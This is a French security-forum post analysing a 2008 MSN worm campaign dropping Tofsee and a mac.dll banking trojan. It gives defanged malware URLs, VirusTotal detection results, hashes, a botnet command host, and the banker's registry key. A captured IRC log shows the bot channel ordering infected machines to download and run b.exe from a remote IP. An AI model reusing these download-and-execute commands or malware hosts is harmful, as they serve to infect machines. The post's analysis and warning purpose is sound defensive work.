MSN Worms + Tofsee + mac.dll Banker

Informations sur les arnaques et Virus sur MSN.
Malekal_morte
Messages : 113163
Inscription : 10 sept. 2005 13:57

MSN Worms + Tofsee + mac.dll Banker

par Malekal_morte »

hxtp://www.emspk.com/modules/gallery/2.exe
hxtp://216.146.46.20/b.exe
hxtp://www.concours-accesd.com/rx.exe

2/37 @ VT pour tous :
http://www.virustotal.com/fr/analisis/9 ... c1c6c9ca8a
http://www.virustotal.com/fr/analisis/e ... 83f7ed4431
http://www.virustotal.com/fr/analisis/f ... 5691353b91

Exemple :
Fichier rx.exe reçu le 2008.11.30 13:13:31 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 2/37 (5.41%)

Antivirus Version Dernière mise à jour Résultat
AhnLab-V3 2008.11.28.2 2008.11.29 -
AntiVir 7.9.0.36 2008.11.29 -
Authentium 5.1.0.4 2008.11.30 -
Avast 4.8.1281.0 2008.11.29 -
AVG 8.0.0.199 2008.11.29 -
BitDefender 7.2 2008.11.30 -
CAT-QuickHeal 10.00 2008.11.29 -
ClamAV 0.94.1 2008.11.30 -
DrWeb 4.44.0.09170 2008.11.29 -
eSafe 7.0.17.0 2008.11.30 -
eTrust-Vet 31.6.6234 2008.11.28 -
Ewido 4.0 2008.11.30 -
F-Prot 4.4.4.56 2008.11.29 -
F-Secure 8.0.14332.0 2008.11.30 -
Fortinet 3.117.0.0 2008.11.30 -
GData 19 2008.11.30 -
Ikarus T3.1.1.45.0 2008.11.30 VirTool.Win32.CeeInject
K7AntiVirus 7.10.538 2008.11.29 -
Kaspersky 7.0.0.125 2008.11.30 -
McAfee 5449 2008.11.29 -
McAfee+Artemis 5449 2008.11.29 -
Microsoft 1.4104 2008.11.30 VirTool:Win32/CeeInject.gen!J
NOD32 3651 2008.11.30 -
Norman 5.80.02 2008.11.28 -
Panda 9.0.0.4 2008.11.30 -
PCTools 4.4.2.0 2008.11.30 -
Prevx1 V2 2008.11.30 -
Rising 21.05.62.00 2008.11.30 -
SecureWeb-Gateway 6.7.6 2008.11.29 -
Sophos 4.36.0 2008.11.30 -
Sunbelt 3.1.1832.2 2008.11.27 -
Symantec 10 2008.11.30 -
TheHacker 6.3.1.1.169 2008.11.29 -
TrendMicro 8.700.0.1004 2008.11.28 -
VBA32 3.12.8.9 2008.11.29 -
ViRobot 2008.11.29.1492 2008.11.29 -
VirusBuster 4.5.11.0 2008.11.29 -
Information additionnelle
File size: 366254 bytes
MD5...: ec9358e10eb8c9850f1e2ccad51da857
SHA1..: 58ab8fb4365612222982baf6c36783295a05a578
ipowerwebz.mine.nu port 81

Code : Tout sélectionner

Nick: USA|2217945
Username: mwdkfhc
Joined Channel: ##rx##
Channel Topic for Channel ##rx##: ".download http://216.146.46.20/b.exe c:\windows\z.exe 1"
Private Message to Channel ##rx##: "[DOWNLOAD]: Downloading URL: http://216.146.46.20/b.exe to: c:\windows\z.exe."
Private Message to Channel ##rx##: "[DOWNLOAD]: Downloaded 85.5 KB to c:\windows\z.exe @ 85.5 KB/sec."
Private Message to Channel ##rx##: "[DOWNLOAD]: Opened: c:\windows\z.exe."
Banker = C:\WINDOWS\system32\mac.dll
HKLM\​SOFTWARE\​MICROSOFT\​WINDOWS\​CURRENTVERSION\​EXPLORER\​BROWSER HELPER OBJECTS\​{33161E98-0A6C-4d3c-BD62-3A7D56137F52}
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Vers/Virus MSN et arnaques sur MSN »